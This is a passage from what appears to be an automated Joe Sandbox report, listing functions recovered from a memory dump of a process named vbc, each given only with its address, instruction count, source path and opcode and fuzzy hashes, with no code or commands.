                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                • Instruction ID: 2df2d4ca9b4b84375b8a114be3ce4f21b6fc5ab954caec354fbfe0167e5182bb
                                                                • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                • Instruction Fuzzy Hash: CC01D236744505AFDF259F74C904F6AB6AEFB81760F0580A8ED0A9B260E772DE41C790
                                                                Function 055CA250 Relevance: .1, Instructions: 52COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                • Instruction ID: 5be8a16c1a11f9b79031f9255e5cef944e79bd8206f79c97cd02e146b8655818
                                                                • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                • Instruction Fuzzy Hash: 8601C4725057299FDB308F95D840A367FA5FB4576470089ADFC978B690D731D440CBA0
                                                                Function 0564E1D0 Relevance: .1, Instructions: 51COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f301ada4da6e3a3017d8fed596e1ddeb8619d501febd901f7442d73944b72253
                                                                • Instruction ID: 430ff3404e4c16cac8c82c8d01fdc9e50cf8bee92c49faae2767acaa15ca8f07
                                                                • Opcode Fuzzy Hash: f301ada4da6e3a3017d8fed596e1ddeb8619d501febd901f7442d73944b72253
                                                                • Instruction Fuzzy Hash: F611AD32241641EFCB25EF18CD94F16BBB8FF84B54F2400A9F9069B661C235ED01CBA0
                                                                Function 055D6259 Relevance: .1, Instructions: 51COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 88086636f86111909a8eb61e0a203d5eff9e3a26781cea4d8d63514d9290f95d
                                                                • Instruction ID: 5c992d280f43d7bb1acc9e0beab1e1bc141b698b8c22e0d50dbf0012601c663c
                                                                • Opcode Fuzzy Hash: 88086636f86111909a8eb61e0a203d5eff9e3a26781cea4d8d63514d9290f95d
                                                                • Instruction Fuzzy Hash: 2711EC71641228ABDB34EB68CD56FE8B3B4BF08310F1041D8A719A61E0CB309E81CF88
                                                                Function 055C6DF6 Relevance: .1, Instructions: 51COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d0efde03de215228f1546e4611099ad3d3c058d04d33d705aacce043a42c34de
                                                                • Instruction ID: 87ae59fe24ab4ba7d9ec8e5892e6d6f73013ac55a1c4564adef6ea9ebb84d1f8
                                                                • Opcode Fuzzy Hash: d0efde03de215228f1546e4611099ad3d3c058d04d33d705aacce043a42c34de
                                                                • Instruction Fuzzy Hash: B601B532714A12ABCB21AE699C49977BBA5FFD4320F00056CF98687A51DF21FC51CAD1
                                                                Function 05606DA0 Relevance: .1, Instructions: 51COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c0ec4d266471c9547166acc1fd1eb763428ac71706b94ce862d4cb5f0fc29682
                                                                • Instruction ID: 5ffccec9bfe5f8f8ccfb0daa799c540f863fa821f39f5e63195ad36a401cb9bc
                                                                • Opcode Fuzzy Hash: c0ec4d266471c9547166acc1fd1eb763428ac71706b94ce862d4cb5f0fc29682
                                                                • Instruction Fuzzy Hash: FB01287160C31567EF2D9B95D804B9F7B69EB80B50F044015E9075B2C0DB74E8A1C3E0
                                                                Function 05666500 Relevance: .0, Instructions: 50COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 72fc83f4603b8faf2de05160c73b18b20ad2b5e49bf92813fefb13b42f5f1d94
                                                                • Instruction ID: eb8d5978ada69d6c416c2539d3f3466c4c2521b1c04cc5eccddcb994733242bc
                                                                • Opcode Fuzzy Hash: 72fc83f4603b8faf2de05160c73b18b20ad2b5e49bf92813fefb13b42f5f1d94
                                                                • Instruction Fuzzy Hash: 7711C8326441459FC710CF59D801BA5FBB6FB96314F088159E845CB715D731FC81CBA0
                                                                Function 05656050 Relevance: .0, Instructions: 50COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 298a97de6964a55f47d916939b507ca40e3a991d82642694526ce6901fc4ee40
                                                                • Instruction ID: ebb3687c47d01bd10f9c25acf377e2ca3d8001b2c541f840aa0fc4917c9f043e
                                                                • Opcode Fuzzy Hash: 298a97de6964a55f47d916939b507ca40e3a991d82642694526ce6901fc4ee40
                                                                • Instruction Fuzzy Hash: B6111773900119ABCB15DB94CC84DEFBB7DFF48258F044166A906A7210EA34AA55CBA4
                                                                Function 055D208A Relevance: .0, Instructions: 50COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                • Instruction ID: 65b55c11a408e22dcf32a2514af1db4be437f97019b1e04f8be2541587feb476
                                                                • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                • Instruction Fuzzy Hash: D701F13B3011108BDF24CA29D880EA2F767BFC4700F1645A9ED068F345DA72A881CBA0
                                                                Function 056A4D30 Relevance: .0, Instructions: 50COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 10816a412db4b6a3a08bde462d9c791e71dabc7c5a7319ffdbedba41fd4a1fd2
                                                                • Instruction ID: 6a1010cc031c120dd0b6804ab531d2c93ebd218708784120339cfc249b4f6fbf
                                                                • Opcode Fuzzy Hash: 10816a412db4b6a3a08bde462d9c791e71dabc7c5a7319ffdbedba41fd4a1fd2
                                                                • Instruction Fuzzy Hash: 0F015E72A1015CEBCF11EFA9DD46EAFBFB9EB48650F040019F515E7211CA70DA11CBA4
                                                                Function 0560E5CF Relevance: .0, Instructions: 49COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 021fbe84cd0184c86c04bdd90164c839663874e5fec95689e78c5b98ac6570f8
                                                                • Instruction ID: debf63b4f911942b4d7b15f37b34ca4df6f2920a7d23d27f7d7f6534fc518603
                                                                • Opcode Fuzzy Hash: 021fbe84cd0184c86c04bdd90164c839663874e5fec95689e78c5b98ac6570f8
                                                                • Instruction Fuzzy Hash: 2201F771311A017FC315BB39CD84E13B7ACFFC5750B000669B10983650DB64EC01CAE0
                                                                Function 055CC020 Relevance: .0, Instructions: 49COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                • Instruction ID: feec2da0e4ae920c0c354aa61f5d37815642054a8b46c622b3c2bf70d29e1240
                                                                • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                • Instruction Fuzzy Hash: BE01B532200B459FDB22D665C904EAB77FAFFC5354F05485DA9569BA40DAB0F802CF50
                                                                Function 056120F0 Relevance: .0, Instructions: 49COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5f894fc8ac7d6f7465428d9de4b58c2402c293bea113f4bce6d11ea1c1d3b4b7
                                                                • Instruction ID: 556a46f25a8e5b2d03c67d653656888aca0e862ca9435664373d0b638199202a
                                                                • Opcode Fuzzy Hash: 5f894fc8ac7d6f7465428d9de4b58c2402c293bea113f4bce6d11ea1c1d3b4b7
                                                                • Instruction Fuzzy Hash: E1115775A0024CABDB05EFA4C955EAE7BAAFB44354F004059EE059B290DB35AE11CB94
                                                                Function 0565C460 Relevance: .0, Instructions: 48COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d44704bbc65c138b04d0a0deace3c9b7c92bc19fd4fca25400f0cf6e269b1395
                                                                • Instruction ID: 577e48bca40d386787f721b3f13169e1c1f6ac1f29d485a59ca52189b28c95f3
                                                                • Opcode Fuzzy Hash: d44704bbc65c138b04d0a0deace3c9b7c92bc19fd4fca25400f0cf6e269b1395
                                                                • Instruction Fuzzy Hash: 10113975A0024CABDF06EF64C845EAE7BB9FB48354F004159FC0197350DA34AD11CB94
                                                                Function 055EE016 Relevance: .0, Instructions: 46COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                • Instruction ID: ac292eef4c1834eceac414dc1390ec89d4f6023352a8f1f39a1bc3ae6217885b
                                                                • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                • Instruction Fuzzy Hash: F9017C32214984DFD32BC61DCA48F2677DDFB84B50F0904A1E806CBA91D628ED80C661
                                                                Function 055C826B Relevance: .0, Instructions: 46COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 41b30b88cdfa0c54d927cd58f0d686d3b2d1d3520931c0706f5db17746470ac7
                                                                • Instruction ID: 2d44eaaa9838e93af418596fc3c5e433fa402cedf84aeb5d03a79c6a691b7e57
                                                                • Opcode Fuzzy Hash: 41b30b88cdfa0c54d927cd58f0d686d3b2d1d3520931c0706f5db17746470ac7
                                                                • Instruction Fuzzy Hash: FD01D431B10908DFCB04DBE9D918ABE7BB9FF80320F4940AD9D03A7240DE70E801C690
                                                                Function 05654C0F Relevance: .0, Instructions: 46COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5251bb07c6ce6b521ede0c6935a4e6a771f390f38fe0ccb683e5283741e4dafe
                                                                • Instruction ID: 392cc7b33b4688d1951139ce74dbe641f323e626f467b3731f5b7cca479f9f9d
                                                                • Opcode Fuzzy Hash: 5251bb07c6ce6b521ede0c6935a4e6a771f390f38fe0ccb683e5283741e4dafe
                                                                • Instruction Fuzzy Hash: FF018F72B51305ABCF209F9CD9C4B6ABBBCABC4761F1000A9E90597301DBB0ED45C768
                                                                Function 055D2582 Relevance: .0, Instructions: 45COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 17c471ecae61c32e4e988ee0eb1c51ba33118cfb379f355b93e24230b097582e
                                                                • Instruction ID: a6644d46634aae11bff03fef7499a9f28ee68313bdadce792e1d069072c48569
                                                                • Opcode Fuzzy Hash: 17c471ecae61c32e4e988ee0eb1c51ba33118cfb379f355b93e24230b097582e
                                                                • Instruction Fuzzy Hash: 6EF08133B41B21A7C7359B5A8D44F57BAAAFBC4A90F154429A50AAB640DA30ED01DAB0
                                                                Function 056A4F68 Relevance: .0, Instructions: 45COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bb2b76d361436c859605596e82eeb5d88147facf418ec50c9010b8a780e1da45
                                                                • Instruction ID: a6b7251ae2f78db823b270ab368857ef761b986705f58d64c5459ec31334cfde
                                                                • Opcode Fuzzy Hash: bb2b76d361436c859605596e82eeb5d88147facf418ec50c9010b8a780e1da45
                                                                • Instruction Fuzzy Hash: 0F0129B1A0020DABCB04DFA9D9459AEBBF8FF48304F14445AF901E7340DB74EA01CBA4
                                                                Function 055FC073 Relevance: .0, Instructions: 43COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                • Instruction ID: cd71651bbc8493232ba89543587104513b30d3d2578d9d942a30c3a077b75ecf
                                                                • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                • Instruction Fuzzy Hash: 1FF062B3A00615ABD334DF5DDC40E67F7EEEBC4A90F058169A555D7220EA31ED05CB90
                                                                Function 056A634F Relevance: .0, Instructions: 43COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 462d10378a30bf118790bff6c4b6d0840230b9a90bba53d9b0e203fed3b6fd52
                                                                • Instruction ID: 7bb9975753d713d9d332804eb22bc3c8adde4af500b263fa0f41be51cde14751
                                                                • Opcode Fuzzy Hash: 462d10378a30bf118790bff6c4b6d0840230b9a90bba53d9b0e203fed3b6fd52
                                                                • Instruction Fuzzy Hash: 54012C72E1020DEBCB04DFA9D555AAEBBF8FF58304F14406AF905E7350DA74AA01CBA4
                                                                Function 055CC310 Relevance: .0, Instructions: 43COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                • Instruction ID: 1f3d704fc4c9b1d00bd4f9551e7e5d5650c35db87e7f016bb0ef24f58a018613
                                                                • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                • Instruction Fuzzy Hash: 21F0C833244A229FC73296D95844B2BAE96BFC1F64F1A00BDF12E9B204C9648C0297D1
                                                                Function 056A625D Relevance: .0, Instructions: 43COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9b4013d2d6c8c2927f2f13024d0ad7b488d379228536c7887c51b8a19a1cc939
                                                                • Instruction ID: c6c192e68f3cb25c2e40c995cc2bf393c609ee846007788d5b8cb2750759f980
                                                                • Opcode Fuzzy Hash: 9b4013d2d6c8c2927f2f13024d0ad7b488d379228536c7887c51b8a19a1cc939
                                                                • Instruction Fuzzy Hash: BC017C71E1020DEBCB04DFA9D545AAEB7F8EF48300F14406AF905E7391DA74AE01CBA4
                                                                Function 056A62D6 Relevance: .0, Instructions: 43COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 11e378221f2e9f6f60a55c4f92769b5206de1d6aa6a6b19732311fb9df3b4dbd
                                                                • Instruction ID: 926738ae1732430c27c147daf59f4f15f3b75a85a15fe42d4b118703dec63693
                                                                • Opcode Fuzzy Hash: 11e378221f2e9f6f60a55c4f92769b5206de1d6aa6a6b19732311fb9df3b4dbd
                                                                • Instruction Fuzzy Hash: CE017171E0020DEBCB04DFA9D545AAEBBF8EF48300F54405AF905E7350DA749D01CBA4
                                                                Function 056A4FE7 Relevance: .0, Instructions: 43COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 417fac29eb78dccf8f1d652f275266da14447efdab3c47aeefb54d205dc39f05
                                                                • Instruction ID: 165a44bc9d58e103d9e570fae1ca205aa999b4f3ee1b0dc837cfe8675c7bfd5e
                                                                • Opcode Fuzzy Hash: 417fac29eb78dccf8f1d652f275266da14447efdab3c47aeefb54d205dc39f05
                                                                • Instruction Fuzzy Hash: 20015EB1A0020D9BCB00DFA9D9459AEBBB8EF48350F14005AE901E7340D634AA01CBA4
                                                                Function 056A61E5 Relevance: .0, Instructions: 41COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: dc43d85427f90558c1be88b16e37c702412a4e92669dab39857c3c052769ca20
                                                                • Instruction ID: 7da73aba6b45a8345e5a1cd5c23842c1d108998c7629b0488419cd7da0a623a2
                                                                • Opcode Fuzzy Hash: dc43d85427f90558c1be88b16e37c702412a4e92669dab39857c3c052769ca20
                                                                • Instruction Fuzzy Hash: 66012C71A102499BCB04DFA9D545AAEBBB8AF48310F14405AE905A7390EB74AA01CB98
                                                                Function 056563C0 Relevance: .0, Instructions: 41COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                • Instruction ID: 6bb37f53542f62dc40271d8e173c311a4b1d1b3a89771b1e31581277f17a5e19
                                                                • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                • Instruction Fuzzy Hash: 6CF01D7220001DBFEF029F94DE80DAF7B7DFF892A8B114125FA11A6160D631DD21EBA0
                                                                Function 0565A4B0 Relevance: .0, Instructions: 40COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b17be3f9f7c16e1572d045a2be9505f65a8e7e0011f1e8d66cd101328140d4f4
                                                                • Instruction ID: 52556f16ff123e6f19492c59f80eccdff43ae4839476e7ee206f079bf2231e97
                                                                • Opcode Fuzzy Hash: b17be3f9f7c16e1572d045a2be9505f65a8e7e0011f1e8d66cd101328140d4f4
                                                                • Instruction Fuzzy Hash: 19019736110109ABCF129F84DC45EEE3FA6FF4C765F068201FE1966620C632E971EB81
                                                                Function 0560656A Relevance: .0, Instructions: 39COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: dbf84b19b1b25357a9b98af01724eceab6ba66d578eede1050f182876aa1066b
                                                                • Instruction ID: b2c6939771084b5a7d679ea6b60ab6c1fdce1e3900b3446b652b120a50ccbd80
                                                                • Opcode Fuzzy Hash: dbf84b19b1b25357a9b98af01724eceab6ba66d578eede1050f182876aa1066b
                                                                • Instruction Fuzzy Hash: 4901A4703047859FE7279728CE4DF3637A5BB40B44F481594B9029BFE1EB68E401C614
                                                                Function 055CC0F0 Relevance: .0, Instructions: 39COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7b4e67aaf5bc555a82d88340e0b0e741054e225edb38700252c3c8d2d059b98e
                                                                • Instruction ID: 4daa959de02bb7ca345b68df152ad46fcc96a7ac934380edf3b8f288f3156cfb
                                                                • Opcode Fuzzy Hash: 7b4e67aaf5bc555a82d88340e0b0e741054e225edb38700252c3c8d2d059b98e
                                                                • Instruction Fuzzy Hash: D6F02B727142015FE31495969C41F3236E6F7C8750F6580ADE61E8B2C0ED70DC01C3D4
                                                                Function 0567437C Relevance: .0, Instructions: 37COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                • Instruction ID: f640006de3a22679592f2b16e0282789a1178c68bd63d70e1d2760b260d61af1
                                                                • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                • Instruction Fuzzy Hash: E0F0E931345E2347DF35AA2B8428B3EA256FFC0A62B05072C940ACBBD0DF20D801C780
                                                                Function 05658D20 Relevance: .0, Instructions: 35COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d0b0a15a2f7e9b1ac986d58965d8847ef9a33856f90cfeecac012c91ee3e5450
                                                                • Instruction ID: d9cd50655937760911adbfc17d649c747ed876686b1157b8a569238ec2be6bf8
                                                                • Opcode Fuzzy Hash: d0b0a15a2f7e9b1ac986d58965d8847ef9a33856f90cfeecac012c91ee3e5450
                                                                • Instruction Fuzzy Hash: 68F090325542486BD7316A18AC88B6AFFEDFBA4720F591519FC4727A118B347C80CB90
                                                                Function 055D47FB Relevance: .0, Instructions: 33COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bb5ad6e1144f7ce486b1163dfa3bc2551574c06fcb5d6f0cc68b14b1facac039
                                                                • Instruction ID: 7428515fc157ee9bf7e9453b303c545fc940ac4ef13baca9f73ecdd06a08b533
